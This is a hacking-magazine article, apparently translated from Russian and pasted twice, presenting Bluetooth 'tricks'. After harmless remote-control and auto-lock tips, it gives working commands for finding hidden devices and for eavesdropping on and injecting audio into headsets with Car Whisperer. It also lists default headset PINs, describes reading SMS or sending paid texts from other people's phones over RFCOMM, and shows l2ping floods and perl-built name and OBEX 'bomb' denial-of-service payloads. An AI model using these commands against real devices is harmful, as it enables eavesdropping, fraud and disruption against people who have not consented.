Everyone knows perfectly well that using Bluetooth you can transfer a file from device to device or connect a wireless headset. But his capabilities are not limited to this. With the right tool with you, you can do real miracles. So why not try yourself as a magician?
The built-in module of Bluetooth technology (or, more officially, IEEE 802.15.3) has long ceased to be a curiosity. The cost of the module is so insignificant that only a lazy manufacturer does not build it into a mobile, laptop or PDA. And even then - for marketing reasons. In short, almost everyone uses Bluetooth. But only a few know that, using technology, they risk giving out their confidential data. But let's start all the same with the good!
Trick 1: Using BT to Access Your Computer Remotely
Once, for a presentation, I invited a long-legged friend to press the space bar to turn over the slides in Power Point. This pleasure cost me an expensive lunch and two hours of empty conversations with the Barbie girl. After that, I firmly decided: next time I will bypass the problem of the lack of a remote control in a different way. And he went around using a mobile phone! Yes, yes, you can flip through slides right from your phone, control music - and God knows what else to do. The main thing is that BT modules are installed on the mobile phone and computer. Not only will you save money and energy, but you will also look unforgivably fashionable. Anyone who uses the utility can show such a trick.
Bluetooth Remote Control, recently updated to version 3.0. It allows you to control your computer from the screen of any mobile phone. Everything is very simple. A special server part is installed on the computer, and a client program written in Java is installed on the phone (requires MIDP 2.0). After setting up a simple circuit, you can remotely control your computer's mouse and keyboard. And most importantly, you will get access to a remote desktop. Real Remote Desktop right from your mobile screen! Well, and with a long-legged friend, you can spend time much more successfully. Bluetooth Remote Control comes in handy here too: to put romantic music
.
Trick 2: BT Access Control
If you work in a room where about a dozen colleagues are sitting with you, you probably had to block your computer when you go to another room. What about? Do not have time to leave, as someone already rummages on your hard. The layout is not the most pleasant. In general, it is necessary to lock the computer, the question is - how? You can use the standard Windows capabilities and enter a long password ten times a day. Or do it beautifully using Bluetooth technology. Everything is as simple as two and two. You move away from the computer - and it is immediately blocked. You come back - and the lock is gone! The only condition: both the computer and the mobile phone must have the module installed
Bluetooth, and the system has the LockItNow program installed (you can easily write such a program yourself, we had a whole article). However, friends and colleagues can be told about telepathic capabilities, and then sell the secret for money. By the way, if there is no BT-module at hand, then it can be replaced with a phone that supports the "blue tooth" (plug in via a COM port).
Trick 3: Snip BT traffic off the air
Mastery starts with understanding. Have you ever had the desire to look inside the protocol and find out how the data exchange through the "blue tooth" occurs? Listening to Bluetooth traffic can only be performed "in itself", that is, it intercepts the outgoing and incoming traffic of the node on which you gave commands. In this case, the so-called Host Controller Interface (HCI) is of no small importance, which allows you to access the transmitter. The HCI node usually connects to the Bluetooth device driver node (downstream) and to the L2CAP node (upstream). The Windows platform does not provide this by default. However, third party developers have released
special drivers that allow you to translate a standard dongle into a sniffer. Traditionally indicative in this regard is the work of the FTS4BT Wireless Bluetooth Protocol Analyzer, which costs a lot of money. The product clings to the fact that it supports the new Bluetooth v2.0 + EDR, on the basis of which modern devices work and, moreover, is able to decode all traffic from the air on the fly, neatly sorting audio, application protocol data and much more. It is clear that for sniffing (and in general) the most relevant class 1 USB dongles, the range of which reaches one hundred meters.
Trick 4: Working with BT Adapter Directly
For a long time, Bluetooth stacks for Windows provided such meager capabilities that programmers simply bypassed this platform. This explains that most programs for serious fun with the "blue tooth" are developed for the nix platform. We will analyze some of the clever tricks on this platform, namely FreeBSD (remember that we posted the latest 7.0 release of this OS on the disk of the previous issue). The Bluetooth technology itself was officially supported on it only from the 5th branch based on the Netgraph subsystem. I am glad that most USB adapters are compatible with the ng_ubt driver (you need to start it before connecting the device). Let's try?
Now I want to introduce you to the hccontrol utility. This is one of the main programs for working with the BT-module. It is she who performs all operations related to the HCI interface, and has the following syntax: hccontrol –n <hci_node_name> <command>. Let's check the functionality of our device, scan the broadcast for devices:
As a result, the utility will display information about the devices found, including their MAC addresses. It should be noted that each of the Bluetooth devices, be it a headset or an ordinary phone, represents a certain set of services. The basic list includes: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point). To find out what services a particular device provides, a request for a special SPD (Service Descovery Protocol) protocol is used. The SPD server works directly on the host machine and is an exclusively informational component (to influence it
impossible). You can determine which services are provided by the found devices using the appropriate utility:
Trick 5: Find Hidden Devices
So, we scanned the broadcast and even found out what services are available on active devices. But here's the catch! Some devices do not give out their presence in any way, because they are in "Undiscoverable mode" and do not respond to broadcast requests. By the settings of your phone, you probably know about such a security option. However, such devices can still be found!
The most famous technique for detecting them is a dull brute-force attack on MAC addresses, that is, sequential sending of requests to different addresses from a certain range. To do this, you need to use a very simple utility Redfang, which goes through the last six bytes of the device address and thus detects hidden devices.
Another option is to use passive techniques: put your device on standby, while assigning some attractive name to the network:
As a result, all incoming connections will be displayed, among which there may easily be friends with hidden identifiers.
Trick 6: Intercept Headset Conversations
One of the main threats to radio technology is that data can be intercepted. The first thing that comes to mind with regards to Bluetooth is to listen to conversations of people using a headset. And often it's real! At the What the Hack hacker festival in the Netherlands, experts from the Trifinite group demonstrated how, using a laptop with Linux, a special program and a directional antenna, you can eavesdrop on what the driver of a passing car is talking about through a Bluetooth headset. The group developed the Car Whisperer program. The capabilities of the program are relatively small: you can listen only to those who forgot to change the factory passwords for accessing Bluetooth like
"0000" or "1234". But such poor fellows, believe me, are very, very many! "Whisperer" is able to wedge in and successfully pass the "pairing" of devices, having received the information transmitted from the carqit or headset to the mobile phone. I want to draw your attention: the utility allows you not only to receive information transmitted between the headset and the mobile, but also to inject your own there. We decided to test the capabilities of this program by downloading Car Whisperer from the developers' site.
Before starting the operation, it is recommended to change the class of your device, especially if the program will be used from a computer:
Otherwise, some "smart" devices may suspect something was wrong. Let's look at the syntax of the utility, which looks like this:
We took the embeddable file directly from the utility folder, and specified out.raw as the output:
The output is the file out.raw. You cannot listen to it in its pure form: you need to convert it to audio format, which will require an additional utility. Quite a few audio converters will work, such as SoX:
In addition to listening, you can log into the system, browse the phone book and take advantage of other hands-free features with Bluetooth. The principle is this: first, a search for active devices is performed and a check for the HS (Head Set) service is performed. Next, the MAC address of the device is examined and an attempt is made to connect using the standard key. If the connection is established, then you can do whatever you want with the device (within the available set of AT commands).
In practice, it looks like this. First, we search for all active headsets using the "sdptool search HS" command, which gives a response like this:
Next, an attempt is made to open an RFCOMM connection on the SCO audio channel using the command "rfcomm connect 2 00: 0A: 3A: 54: 71: 95 1" and sending the necessary AT commands. I will give a small statistical note about authorization data for some models of wireless headsets:
By the way, the same principle can be used for unauthorized connections to all other devices. Using AT commands and the RFCOMM protocol, you can, for example, read an SMS message or even send it from someone else's phone to a paid number, putting the owner of the device on money. Be vigilant!
Trick 7: DDoS BT Devices
The approach is traditional. DDoS can be carried out when the host device ("master") performs work that is many times superior to the client. This situation is called a Denial Of Service attack. It can hang the phone or drain the battery quickly. There are several ways to carry out an attack. Let's start with the standard tools. The most obvious thing is to ping the device with large packets. This can be done by specifying the flag as the "-s" parameter to the l2ping utility:
The program itself, as you already understood, is a relative of ping in a bluetooth environment and serves to check the connection and the availability of a connection. Another method, which is fundamentally different from the first, is to use the "fuzzing" technique - a kind of lottery technique, because it is not known in advance what will happen. This is a new trend in identifying vulnerabilities in products without analyzing source codes. The technique relies only on interactive communication with an object in a language understandable to it, but with absolutely chaotic arguments and variable values. A hacker's task would be to make the visible name of the phone consist of a sufficiently large number of elements. When detected by the "master" in 70%
overflow or denial of service occurs:
Many phones are still unable to digest bomb files. Here is a simple implementation of a similar technique.
Thanks for attention!
The built-in module of Bluetooth technology (or, more officially, IEEE 802.15.3) has long ceased to be a curiosity. The cost of the module is so insignificant that only a lazy manufacturer does not build it into a mobile, laptop or PDA. And even then - for marketing reasons. In short, almost everyone uses Bluetooth. But only a few know that, using technology, they risk giving out their confidential data. But let's start all the same with the good!
Trick 1: Using BT to Access Your Computer Remotely
Once, for a presentation, I invited a long-legged friend to press the space bar to turn over the slides in Power Point. This pleasure cost me an expensive lunch and two hours of empty conversations with the Barbie girl. After that, I firmly decided: next time I will bypass the problem of the lack of a remote control in a different way. And he went around using a mobile phone! Yes, yes, you can flip through slides right from your phone, control music - and God knows what else to do. The main thing is that BT modules are installed on the mobile phone and computer. Not only will you save money and energy, but you will also look unforgivably fashionable. Anyone who uses the utility can show such a trick.
Bluetooth Remote Control, recently updated to version 3.0. It allows you to control your computer from the screen of any mobile phone. Everything is very simple. A special server part is installed on the computer, and a client program written in Java is installed on the phone (requires MIDP 2.0). After setting up a simple circuit, you can remotely control your computer's mouse and keyboard. And most importantly, you will get access to a remote desktop. Real Remote Desktop right from your mobile screen! Well, and with a long-legged friend, you can spend time much more successfully. Bluetooth Remote Control comes in handy here too: to put romantic music
.Trick 2: BT Access Control
If you work in a room where about a dozen colleagues are sitting with you, you probably had to block your computer when you go to another room. What about? Do not have time to leave, as someone already rummages on your hard. The layout is not the most pleasant. In general, it is necessary to lock the computer, the question is - how? You can use the standard Windows capabilities and enter a long password ten times a day. Or do it beautifully using Bluetooth technology. Everything is as simple as two and two. You move away from the computer - and it is immediately blocked. You come back - and the lock is gone! The only condition: both the computer and the mobile phone must have the module installed
Bluetooth, and the system has the LockItNow program installed (you can easily write such a program yourself, we had a whole article). However, friends and colleagues can be told about telepathic capabilities, and then sell the secret for money
. By the way, if there is no BT-module at hand, then it can be replaced with a phone that supports the "blue tooth" (plug in via a COM port).Trick 3: Snip BT traffic off the air
Mastery starts with understanding. Have you ever had the desire to look inside the protocol and find out how the data exchange through the "blue tooth" occurs? Listening to Bluetooth traffic can only be performed "in itself", that is, it intercepts the outgoing and incoming traffic of the node on which you gave commands. In this case, the so-called Host Controller Interface (HCI) is of no small importance, which allows you to access the transmitter. The HCI node usually connects to the Bluetooth device driver node (downstream) and to the L2CAP node (upstream). The Windows platform does not provide this by default. However, third party developers have released
special drivers that allow you to translate a standard dongle into a sniffer. Traditionally indicative in this regard is the work of the FTS4BT Wireless Bluetooth Protocol Analyzer, which costs a lot of money. The product clings to the fact that it supports the new Bluetooth v2.0 + EDR, on the basis of which modern devices work and, moreover, is able to decode all traffic from the air on the fly, neatly sorting audio, application protocol data and much more. It is clear that for sniffing (and in general) the most relevant class 1 USB dongles, the range of which reaches one hundred meters.
Trick 4: Working with BT Adapter Directly
For a long time, Bluetooth stacks for Windows provided such meager capabilities that programmers simply bypassed this platform. This explains that most programs for serious fun with the "blue tooth" are developed for the nix platform. We will analyze some of the clever tricks on this platform, namely FreeBSD (remember that we posted the latest 7.0 release of this OS on the disk of the previous issue). The Bluetooth technology itself was officially supported on it only from the 5th branch based on the Netgraph subsystem. I am glad that most USB adapters are compatible with the ng_ubt driver (you need to start it before connecting the device). Let's try?
- We connect the device: kldload ng_ubt
- Copy the stack loading script to a convenient place: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
- Copy the stack loading script to a convenient place and run: sh /usr/local/etc/rc.bluetoots start ubt0
Now I want to introduce you to the hccontrol utility. This is one of the main programs for working with the BT-module. It is she who performs all operations related to the HCI interface, and has the following syntax: hccontrol –n <hci_node_name> <command>. Let's check the functionality of our device, scan the broadcast for devices:
Code:
hccontrol –n ubt0hci InquiryAs a result, the utility will display information about the devices found, including their MAC addresses. It should be noted that each of the Bluetooth devices, be it a headset or an ordinary phone, represents a certain set of services. The basic list includes: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point). To find out what services a particular device provides, a request for a special SPD (Service Descovery Protocol) protocol is used. The SPD server works directly on the host machine and is an exclusively informational component (to influence it
impossible). You can determine which services are provided by the found devices using the appropriate utility:
Code:
# spdcontrol -a <MAC-адрес устройства> browseTrick 5: Find Hidden Devices
So, we scanned the broadcast and even found out what services are available on active devices. But here's the catch! Some devices do not give out their presence in any way, because they are in "Undiscoverable mode" and do not respond to broadcast requests. By the settings of your phone, you probably know about such a security option. However, such devices can still be found!
The most famous technique for detecting them is a dull brute-force attack on MAC addresses, that is, sequential sending of requests to different addresses from a certain range. To do this, you need to use a very simple utility Redfang, which goes through the last six bytes of the device address and thus detects hidden devices.
Another option is to use passive techniques: put your device on standby, while assigning some attractive name to the network:
Code:
hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddrAs a result, all incoming connections will be displayed, among which there may easily be friends with hidden identifiers.
Trick 6: Intercept Headset Conversations
One of the main threats to radio technology is that data can be intercepted. The first thing that comes to mind with regards to Bluetooth is to listen to conversations of people using a headset. And often it's real! At the What the Hack hacker festival in the Netherlands, experts from the Trifinite group demonstrated how, using a laptop with Linux, a special program and a directional antenna, you can eavesdrop on what the driver of a passing car is talking about through a Bluetooth headset. The group developed the Car Whisperer program. The capabilities of the program are relatively small: you can listen only to those who forgot to change the factory passwords for accessing Bluetooth like
"0000" or "1234". But such poor fellows, believe me, are very, very many! "Whisperer" is able to wedge in and successfully pass the "pairing" of devices, having received the information transmitted from the carqit or headset to the mobile phone. I want to draw your attention: the utility allows you not only to receive information transmitted between the headset and the mobile, but also to inject your own there. We decided to test the capabilities of this program by downloading Car Whisperer from the developers' site.
Before starting the operation, it is recommended to change the class of your device, especially if the program will be used from a computer:
Code:
hciconfig adapter class 0x500204
# 0x500204 is the "phone" classOtherwise, some "smart" devices may suspect something was wrong. Let's look at the syntax of the utility, which looks like this:
Code:
./carwhisperer "what we embed in the line" "what we capture from the line" "device address" [channel]We took the embeddable file directly from the utility folder, and specified out.raw as the output:
Code:
./carwhisperer 0 message.raw /tmp/out.raw
00: 15: 0E: 91: 19: 73The output is the file out.raw. You cannot listen to it in its pure form: you need to convert it to audio format, which will require an additional utility. Quite a few audio converters will work, such as SoX:
Code:
raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 out.wavIn addition to listening, you can log into the system, browse the phone book and take advantage of other hands-free features with Bluetooth. The principle is this: first, a search for active devices is performed and a check for the HS (Head Set) service is performed. Next, the MAC address of the device is examined and an attempt is made to connect using the standard key. If the connection is established, then you can do whatever you want with the device (within the available set of AT commands).
In practice, it looks like this. First, we search for all active headsets using the "sdptool search HS" command, which gives a response like this:
Code:
Inquiring ...
Searching for HS on 00: 0A: 3A: 54: 71: 95 ...
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
"Headset" (0x1108)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100Next, an attempt is made to open an RFCOMM connection on the SCO audio channel using the command "rfcomm connect 2 00: 0A: 3A: 54: 71: 95 1" and sending the necessary AT commands. I will give a small statistical note about authorization data for some models of wireless headsets:
Code:
Nokia (00:02:EE...) - pin="5475"
Audi UHV (00:0E:9F...) - pin="1234"
O'Neill (00:80:37...) - pin="8761"
Cellink (00:0A:94...) - pin="1234"
Eazix (00:0C:84...) - pin="1234"By the way, the same principle can be used for unauthorized connections to all other devices. Using AT commands and the RFCOMM protocol, you can, for example, read an SMS message or even send it from someone else's phone to a paid number, putting the owner of the device on money. Be vigilant!
Trick 7: DDoS BT Devices
The approach is traditional. DDoS can be carried out when the host device ("master") performs work that is many times superior to the client. This situation is called a Denial Of Service attack. It can hang the phone or drain the battery quickly. There are several ways to carry out an attack. Let's start with the standard tools. The most obvious thing is to ping the device with large packets. This can be done by specifying the flag as the "-s" parameter to the l2ping utility:
Code:
# l2ping -s 10000 -b "MAC address"The program itself, as you already understood, is a relative of ping in a bluetooth environment and serves to check the connection and the availability of a connection. Another method, which is fundamentally different from the first, is to use the "fuzzing" technique - a kind of lottery technique, because it is not known in advance what will happen. This is a new trend in identifying vulnerabilities in products without analyzing source codes. The technique relies only on interactive communication with an object in a language understandable to it, but with absolutely chaotic arguments and variable values. A hacker's task would be to make the visible name of the phone consist of a sufficiently large number of elements. When detected by the "master" in 70%
overflow or denial of service occurs:
Code:
hciconfig hci0 name `perl -e 'print" ash "x 3137'`
# Command for Linux
hccontrol –n adapter change_local_name “new name”)
# example for FreeBSDMany phones are still unable to digest bomb files. Here is a simple implementation of a similar technique.
- First, they prepare the "bomb". Famous example:
- echo `perl -e 'print" skvz "x 3137'`> file
- Then they use a modified utility for interacting with OBEX - USSP PUSH (xmailserver.org/ussp-push.html)
- ./obextool push file 00: 0A: 3A: 54: 71: 95 `perl -e 'print" skvz "x 3137'` 3
Thanks for attention!
